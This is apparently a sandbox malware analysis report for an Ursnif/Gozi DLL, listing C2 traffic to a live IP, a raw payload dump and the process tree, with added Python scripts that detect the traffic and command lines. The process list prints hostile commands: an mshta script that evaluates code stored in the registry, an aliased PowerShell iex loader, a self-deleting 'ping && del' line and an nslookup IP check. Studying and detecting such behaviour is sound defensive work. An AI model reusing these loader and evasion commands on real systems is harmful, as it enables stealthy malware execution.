                                        Data Ascii: Tg52 {@^Jb~NJa"f`Z2(~W>@pzh}*dwmLp3VXt" {{eQGPe#CHH+2W:xkkVvDr.}"l)[dsbE>`> jzYK&NzQAn[K!]z KQM/~t-VDW(czGMLrE"Pl'|/]|3`0tt,Fk<7#SA'od2Q-xh'"Zg8DU.f>i9]EGr_4lQykrn)J=eqy0f9_,[XE;Z\pCimK!_u#gvyQS1+Agy%buzZLhKf1+W"CHQ'V9pcQ)<Y4'a{D@^g!UCv(G!s"'MGp-Bmew)k:|PW4t*,E]-G6^\`[{:;7WrQ}[VX]0g8?KmH_m$2:[Yq'Q*h4Nxcx:Scx8vagx)QLK~Y9Q;J_gc0o4K&|gymj)MbgbIj0|?fTs?O3
                                        Apr 22, 2022 18:13:05.383399010 CEST | 1133 | OUT | GET /phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                        Host: 146.70.35.138
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Apr 22, 2022 18:13:05.762598991 CEST | 1147 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 22 Apr 2022 16:13:05 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 1869
                                        Connection: keep-alive
                                        Pragma: public
                                        Accept-Ranges: bytes
                                        Expires: 0
                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                        Content-Disposition: inline; filename="6262d411b019e.bin"
                                        Data Raw: 40 d1 e5 5a 8b c7 b4 20 04 1d ee a2 24 f1 96 9d 26 a1 0b 1b 7e e3 4e 1f 5d 3c 4d da 10 7c 95 81 0f 16 f7 ee 7d fb 39 8c 70 71 45 d9 0f ab ad 60 01 a5 32 5d be 0d 61 0e 50 82 f8 65 5b 9a 22 17 77 7e df 1d d3 e9 2a 08 c4 85 a2 d9 7c 2f 82 76 1f a1 0c 49 88 f8 0e c9 2d a0 8a 50 56 c2 c7 92 94 e2 ec 7e 79 4a 65 9b 26 e4 dd 72 cc a9 e7 63 18 5b ca dd df b9 3c ff 59 43 c8 9c c3 1a 12 d9 00 09 54 eb 65 b3 47 f4 68 0c b2 8f b5 20 fb 61 ad f0 29 d6 ef 6f ad 1f 9b 0f 56 f2 39 7e b4 2e 17 15 94 17 47 de 21 36 e1 25 3a 1c 1e 8d 36 93 c2 c8 4e 60 10 93 49 cd cf 19 4f 0c 1f a5 d3 5d df 25 13 ca 40 20 64 fe 4b 27 eb fb 5b ce 56 73 77 b6 d4 6f 61 c2 6b 4e fe cb 73 77 22 e9 f6 1d 48 0c 2e 7a d7 73 4c e6 51 80 cb f5 e3 20 5b 24 a3 68 83 38 6a 87 1d d6 fc d3 cf f2 a2 a3 35 f3 19 e8 ac 2c e4 cb 70 a5 b0 92 e2 87 00 7b 31 2a 0d 22 de b4 1e 6d 5d 7c 13 90 ef 11 74 34 aa 7e 6b 92 3a e5 d5 5c be 59 0b ec ab 8a db cf 67 a8 2b 63 24 50 a1 20 ed 30 f3 e8 e0 28 6b 51 f4 5e e9 8f c2 69 d8 28 69 51 46 a7 72 50 9d 2a 97 f7 91 81 7c 6c 5a d0 ba ac bd 1c d8 97 9e 7f 2d 30 0e 8b 0a c6 f9 a4 b5 dc 66 f3 19 b7 79 89 51 9b eb 95 fa e6 32 f7 db 83 04 be d0 a4 34 40 10 7b e0 ea 75 18 6e 32 43 93 ff ec 97 e9 13 de b1 39 90 ae fd b1 88 f6 eb a8 a3 5f d3 40 f2 8a c8 1a b5 da 23 07 28 14 d4 48 91 e4 75 6c 2e 2f 59 14 ed cd 56 33 a4 6f 3c 74 70 51 26 d2 f1 00 9d c7 9e 68 ca 93 01 b0 18 8b 9c 3a 19 27 47 cf c7 cc f2 d1 42 aa e5 ce 1f 0f 07 03 9a 24 72 37 bc 30 c3 42 3d 57 49 09 18 78 26 bc 66 1e 36 de 2a c7 72 0d 10 ee fa 93 05 a5 63 7e 1c e1 d8 c6 71 0e 0f 77 91 6d aa 79 b3 3a 27 fe 2e 3b 53 ad 84 37 f4 45 54 52 da 80 67 3c 9c 44 86 2a a7 58 26 94 83 b1 bd ca d7 ad 1d 43 f8 70 2b 43 d2 05 fd d2 bd 6b 6f 62 28 7b 75 60 c4 14 07 07 2c f7 3e f3 95 1f 56 90 0c 06 3e 6c 02 6c 89 e1 6c 0b cb a0 a3 9c ba 25 72 e8 31 27 75 22 9d 20 f7 46 af 10 5d c0 d6 ec 16 ab 36 03 82 9f fb a2 ca 77 e2 f1 69 ad fe a5 b9 2c 1b 4a e3 1d 69 43 fc 81 b7 22 57 f1 2c fa 72 4d 17 49 56 ad 
1f ff 4a a5 38 50 c9 b2 68 b3 c4 e2 33 e0 9b 81 eb 69 56 89 c3 9b 32 9c 57 30 ee 5d 75 8b e2 b2 d7 ee fb a8 48 a0 5e f2 34 a7 15 38 ac ae 28 2c 60 6f 00 b8 12 2b bf 5a 7d fc 9d 1c f0 1a dd a6 92 7f f1 c5 f3 02 e2 83 f6 a1 52 db f7 14 b9 38 35 28 e6 2b 62 1a 3f b8 e0 b5 43 ea a8 92 b6 60 5b 95 b3 d5 09 19 61 54 a7 f6 67 69 2b 6d 9e 93 4e 6a 56 d6 3f 53 09 df 02 18 fe f4 5e 79 48 1e 9b 82 dc cf fb 80 f3 bb 65 a6 56 0e 5a e8 78 a7 13 70 ac ce cc c9 43 75 3c f7 ef 58 23 f8 c7 88 e3 17 85 ca 17 bb 6e 86 b2 4d 6f 8a da 5c 1b 90 9a d2 4d 26 35 99 bb 8b 29 ea 31 7b 6b 5f b9 0e 00 3a a4 e4 ea 72 09 48 da 0c d2 ae 7f 25 91 ec 37 59 6e 37 a1 80 7c 8e 19 d1 1d 3a ee dc 6d 6a 4c 0b 42 b6 2b 61 83 0b d7 d9 f5 f6 ce 72 f7 b5 90 05 e5 3f 8a 59 21 da ac 86 48 37 1f 98 8f 3a 7e a8 72 fb a7 30 f0 f0 02 05 b3 ae ea dd 01 b1 44 fd d2 ee a8 d7 98 54 14 92 eb 8f 4e 62 a3 f2 7e 80 f8 92 9d 71 a2 ed 5c 8a 7c f2 dd 5c 75 7c 65 29 cd 7c e2 5d aa 2d f2 1d f5 f7 ab 93 ec 3b 66 10 48 80 13 8e 53 aa 6d ca d6 5e d2 47 e2 a0 4b fe ca fd 03 fd fa 45 3e c5 74
                                        Data Ascii: @Z $&~N]<M|}9pqE`2]aPe["w~*|/vI-PV~yJe&rc[<YCTeGh a)oV9~.G!6%:6N`IO]%@ dK'[VswoakNsw"H.zsLQ [$h8j5,p{1*"m]|t4~k:\Yg+c$P 0(kQ^i(iQFrP*|lZ-0fyQ24@{un2C9_@#(Hul./YV3o<tpQ&h:'GB$r70B=WIx&f6*rc~qwmy:'.;S7ETRg<D*X&Cp+Ckob({u`,>V>lll%r1'u" F]6wi,JiC"W,rMIVJ8Ph3iV2W0]uH^48(,`o+Z}R85(+b?C`[aTgi+mNjV?S^yHeVZxpCu<X#nMo\M&5)1{k_:rH%7Yn7|:mjLB+ar?Y!H7:~r0DTNb~q\|\u|e)|]-;fHSm^GKE>t
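
Triage heuristics for the exchange above, as an added example (this is not Joe Sandbox output and not code from the sample). The request and response headers are copied from the capture and embedded as constructed strings so the script runs offline; the rule names, the depth and token thresholds, and the IE-major-to-Windows-NT table are this example's own assumptions. Two observations drive the rules: "MSIE 8.0; Windows NT 10.0" is a pair no shipping Internet Explorer produces (IE8 ran on Windows XP through 7, and IE8 and later always send a Trident/ token), and the `_2F`/`_2B` tokens are the substitution Gozi/Ursnif applies to `/` and `+` in its base64 URI blob. The blob itself is encrypted with a key that is not on this page, so the script counts the tokens and does not try to decode it.

```python
"""Triage heuristics for the Gozi/Ursnif C2 exchange captured above (added example)."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed from the request/response header lines on this page; bodies omitted.
SAMPLE_REQUEST = (
    "GET /phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/"
    "1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/"
    "y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/"
    "dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/"
    "wefwGHcoUJ1uL/B.src HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
    "Host: 146.70.35.138\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.18.0 (Ubuntu)\r\n"
    "Date: Fri, 22 Apr 2022 16:13:05 GMT\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 1869\r\n"
    "Connection: keep-alive\r\n"
    "Pragma: public\r\n"
    "Accept-Ranges: bytes\r\n"
    "Expires: 0\r\n"
    "Cache-Control: must-revalidate, post-check=0, pre-check=0\r\n"
    'Content-Disposition: inline; filename="6262d411b019e.bin"\r\n\r\n'
)

# Newest Windows NT version each MSIE major shipped for (assumed table):
# Vista = 6.0, Windows 7 = 6.1, Windows 8 = 6.2. Windows 10 is NT 10.0.
IE_MAX_NT = {7: 6.0, 8: 6.1, 9: 6.1, 10: 6.2}
UA_RE = re.compile(r"MSIE (\d+)\.\d+;.*?Windows NT (\d+(?:\.\d+)?)")
ENCODED_TOKEN_RE = re.compile(r"_2[FB]")  # Gozi's stand-in for '/' and '+'


def parse_http_message(raw):
    """Return (start line, {lower-case header name: value}) for one raw HTTP message."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def ua_inconsistent(ua):
    """True when the MSIE / Windows NT pair could not come from a real Internet Explorer."""
    m = UA_RE.search(ua)
    if not m:
        return False
    major, nt = int(m.group(1)), float(m.group(2))
    if "Trident/" in ua:
        return False  # Compatibility View lowers the MSIE token but keeps Trident
    # IE8+ always carries a Trident token; older majors never ran on newer NT.
    return major >= 8 or (major in IE_MAX_NT and nt > IE_MAX_NT[major])


def host_is_bare_ip(host):
    """True for a Host header that is a literal IPv4/IPv6 address, optionally with a port."""
    host = host.strip()
    if host.startswith("[") and "]" in host:
        candidate = host[1:host.index("]")]
    elif host.count(":") == 1:
        candidate = host.split(":")[0]
    else:
        candidate = host
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def path_stats(path):
    segments = [s for s in path.split("/") if s]
    last = segments[-1] if segments else ""
    return {
        "depth": len(segments),
        "encoded_tokens": len(ENCODED_TOKEN_RE.findall(path)),
        "extension": last.rsplit(".", 1)[1] if "." in last else "",
    }


def triage_exchange(request_raw, response_raw):
    start, req = parse_http_message(request_raw)
    _method, target, _version = start.split(" ", 2)
    stats = path_stats(urlsplit(target).path)
    findings = []
    if host_is_bare_ip(req.get("host", "")):
        findings.append("host_is_bare_ip")
    if ua_inconsistent(req.get("user-agent", "")):
        findings.append("ua_browser_os_mismatch")
    if stats["depth"] >= 8:  # threshold is an assumption
        findings.append("deep_random_path")
    if stats["encoded_tokens"] >= 2:  # threshold is an assumption
        findings.append("gozi_style_2F_2B_encoding")
    _status, resp = parse_http_message(response_raw)
    if resp.get("content-type", "").startswith("application/octet-stream"):
        findings.append("octet_stream_response")
    m = re.search(r'filename="?([^";]+)', resp.get("content-disposition", ""))
    return {
        "host": req.get("host", ""),
        "path": stats,
        "payload_name": m.group(1) if m else "",
        "payload_bytes": int(resp.get("content-length", "0") or 0),
        "findings": findings,
    }


if __name__ == "__main__":
    for key, value in triage_exchange(SAMPLE_REQUEST, SAMPLE_RESPONSE).items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the stats and the five findings for this exchange; in a proxy or IDS pipeline the same `triage_exchange` call would be fed the reassembled request/response pair. The `_2F`/`_2B` count and the path depth are the two signals that survive a C2 IP change, which is why they are kept separate from the Host check.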


                                        Target ID:0
                                        Start time:18:11:58
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\loaddll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll"
                                        Imagebase:0x3c0000
                                        File size:116736 bytes
                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:1
                                        Start time:18:11:59
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                                        Imagebase:0x1100000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:2
                                        Start time:18:12:00
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                                        Imagebase:0xb90000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high

                                        Target ID:4
                                        Start time:18:12:03
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608
                                        Imagebase:0x1000000
                                        File size:434592 bytes
                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:7
                                        Start time:18:12:08
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 616
                                        Imagebase:0x1000000
                                        File size:434592 bytes
                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:9
                                        Start time:18:12:20
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 652
                                        Imagebase:0x1000000
                                        File size:434592 bytes
                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:17
                                        Start time:18:13:10
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\mshta.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                        Imagebase:0x7ff619ca0000
                                        File size:14848 bytes
                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:18
                                        Start time:18:13:13
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                        Imagebase:0x7ff619710000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high

                                        Target ID:19
                                        Start time:18:13:14
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:21
                                        Start time:18:13:29
                                        Start date:22/04/2022
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
                                        Imagebase:0x7ff6eb830000
                                        File size:2739304 bytes
                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        Target ID:22
                                        Start time:18:13:31
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\control.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\control.exe -h
                                        Imagebase:0x7ff7500b0000
                                        File size:117760 bytes
                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                        Target ID:23
                                        Start time:18:13:32
                                        Start date:22/04/2022
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP"
                                        Imagebase:0x7ff6eae70000
                                        File size:47280 bytes
                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:24
                                        Start time:18:13:43
                                        Start date:22/04/2022
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline
                                        Imagebase:0x7ff6eb830000
                                        File size:2739304 bytes
                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        Target ID:25
                                        Start time:18:13:45
                                        Start date:22/04/2022
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP"
                                        Imagebase:0x7ff6eae70000
                                        File size:47280 bytes
                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:26
                                        Start time:18:13:47
                                        Start date:22/04/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff74fc70000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:27
                                        Start time:18:14:03
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:28
                                        Start time:18:14:04
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:29
                                        Start time:18:14:05
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\PING.EXE
                                        Wow64 process (32bit):false
                                        Commandline:ping localhost -n 5
                                        Imagebase:0x7ff7b6c20000
                                        File size:21504 bytes
                                        MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:31
                                        Start time:18:14:27
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                        Imagebase:0x7ff7b5d10000
                                        File size:99272 bytes
                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:32
                                        Start time:18:14:53
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):
                                        Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                        Imagebase:
                                        File size:69632 bytes
                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:33
                                        Start time:18:15:30
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):
                                        Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1"
                                        Imagebase:
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
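
Detection logic over the process command lines listed above, as an added example (this is not the sandbox's signature set and not code from the sample). The records are copied from the process list on this page, trimmed to the ones that carry a behaviour; the rule names and regular expressions are this example's own. The alias-resolution step exists because the PowerShell line hides `iex` and `gp` behind `New-Alias` names, so a rule that matches on `iex` alone would miss it unless the aliases are folded back first.

```python
"""Command-line detection rules for the process tree above (added example)."""
import re

# (Target ID, command line) pairs copied from the process list on this page.
PROCESS_RECORDS = [
    (0, r'loaddll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll"'),
    (1, r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1'),
    (2, r'rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1'),
    (17, r"""C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>"""),
    (18, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'),
    (21, r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline'),
    (27, r'C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll'),
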